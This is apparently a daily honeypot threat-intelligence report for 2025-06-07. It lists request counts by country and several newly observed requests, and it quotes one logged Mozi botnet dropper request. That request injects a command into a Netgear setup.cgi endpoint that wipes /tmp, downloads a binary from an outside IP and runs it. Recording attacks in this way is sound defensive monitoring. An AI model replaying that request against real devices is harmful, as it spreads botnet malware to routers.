Skip to main content
  1. Daily-Posts/

Report: 2025-06-07

·304 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-07
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).

There are 7 new requests that have never been observed before (these were added to the monitored request database.).

A total of 806 requests were recorded during the day, originating from 1 different countries, with a peak of 222 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
45.230.66.57GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.230.66.57:11823/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
612GET /rules HTTP/1.1
632GET /rules HTTP/1.0
672GET /get_params.cgi HTTP/1.1
2181GET /tisv2/a/de/ HTTP/1.1
2731\x04\x01\x00P\xD0_p\x01\x00
3091\x00\x0E8\x93\xA8\xB9&ZiX\xB7\x00\x00\x00\x00\x00
3101\x00\x0E\x08\x93\xA8\xB9&ZiX\xB7\x00\x00\x00\x00\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0222US
197JP
292BG
355NL
454GB
554VN
643DE
733CA
825IN
923FR
1020NG
1110CN
129PL
138HK
146ZA
156SC
165AO
175GH
184KR
194BE
203PT
213AR
222ES
232RU
242IT
252UA
262KZ
272IE
282SG
292BR
301ID
311SE
321MC
331RO
341GR
351IL
361PA
371LT
381IR

Related

Report: 2025-06-06
·408 words
Repport Daily
Report: 2025-06-05
·513 words
Repport Daily
Report: 2025-06-04
·486 words
Repport Daily